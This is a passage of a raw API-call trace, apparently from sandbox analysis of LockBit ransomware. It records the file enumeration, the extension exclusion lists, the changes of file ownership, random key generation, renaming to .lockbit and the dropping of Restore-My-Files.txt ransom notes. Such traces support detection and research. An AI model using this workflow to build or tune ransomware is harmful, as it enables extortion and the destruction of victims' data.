hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.034] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.046] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.046] malloc (_Size=0xa6) returned 0x77d800 [0093.046] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0093.052] free (_Block=0x77d800) [0093.052] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.052] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.052] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.052] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7272812d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7272812d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x10e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport.wmv", cAlternateFileName="")) returned 1 [0093.052] lstrcmpiW (lpString1=".", lpString2="Passport.wmv") returned -1 [0093.052] lstrcmpiW (lpString1="..", lpString2="Passport.wmv") returned -1 [0093.052] PathFindExtensionW (pszPath="Passport.wmv") returned=".wmv" [0093.052] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.052] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.053] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.053] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Passport.wmv") returned 1 [0093.054] lstrcmpiW (lpString1="ntldr", lpString2="Passport.wmv") returned -1 [0093.054] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Passport.wmv") returned -1 [0093.054] lstrcmpiW (lpString1="bootsect.bak", lpString2="Passport.wmv") returned -1 [0093.054] lstrcmpiW (lpString1="autorun.inf", lpString2="Passport.wmv") returned -1 [0093.054] lstrcmpiW (lpString1="thumbs.db", lpString2="Passport.wmv") returned 1 [0093.054] lstrcmpiW (lpString1="iconcache.db", lpString2="Passport.wmv") returned -1 [0093.054] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.054] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv") returned=".wmv" [0093.054] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.054] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.054] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.055] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.055] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.lockbit") returned 72 [0093.055] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.057] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.059] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.059] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.060] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.062] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.062] RtlFreeAnsiString (AnsiString="\\") [0093.062] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.062] malloc (_Size=0x200) returned 0x77d800 [0093.062] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.062] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.062] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.062] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.063] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.063] CloseHandle (hObject=0x13dc) returned 1 [0093.063] free (_Block=0x77d800) [0093.064] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.064] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.064] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.064] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=69268) returned 1 [0093.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.069] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.078] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.089] malloc (_Size=0xa6) returned 0x77d800 [0093.089] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0093.089] free (_Block=0x77d800) [0093.089] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.089] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.089] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.089] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x58bf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="passportcover.png", cAlternateFileName="")) returned 1 [0093.089] lstrcmpiW (lpString1=".", lpString2="passportcover.png") returned -1 [0093.089] lstrcmpiW (lpString1="..", lpString2="passportcover.png") returned -1 [0093.089] PathFindExtensionW (pszPath="passportcover.png") returned=".png" [0093.089] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.089] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.089] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.090] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.090] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.091] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.091] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.091] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="passportcover.png") returned 1 [0093.091] lstrcmpiW (lpString1="ntldr", lpString2="passportcover.png") returned -1 [0093.091] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="passportcover.png") returned -1 [0093.091] lstrcmpiW (lpString1="bootsect.bak", lpString2="passportcover.png") returned -1 [0093.091] lstrcmpiW (lpString1="autorun.inf", lpString2="passportcover.png") returned -1 [0093.092] lstrcmpiW (lpString1="thumbs.db", lpString2="passportcover.png") returned 1 [0093.092] lstrcmpiW (lpString1="iconcache.db", lpString2="passportcover.png") returned -1 [0093.092] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.092] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png") returned=".png" [0093.092] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.092] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.092] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.092] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.093] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.093] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png.lockbit") returned 77 [0093.093] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.096] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.097] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.097] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.099] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.100] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.100] RtlFreeAnsiString (AnsiString="\\") [0093.100] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.100] malloc (_Size=0x200) returned 0x77d800 [0093.101] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.101] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.101] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.101] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.102] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.102] CloseHandle (hObject=0x13dc) returned 1 [0093.102] free (_Block=0x77d800) [0093.102] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.102] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.102] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.102] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=363512) returned 1 [0093.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.109] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0093.119] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.124] malloc (_Size=0xb0) returned 0x77d800 [0093.128] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0xc0000008 [0093.128] free (_Block=0x77d800) [0093.128] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.129] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.129] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 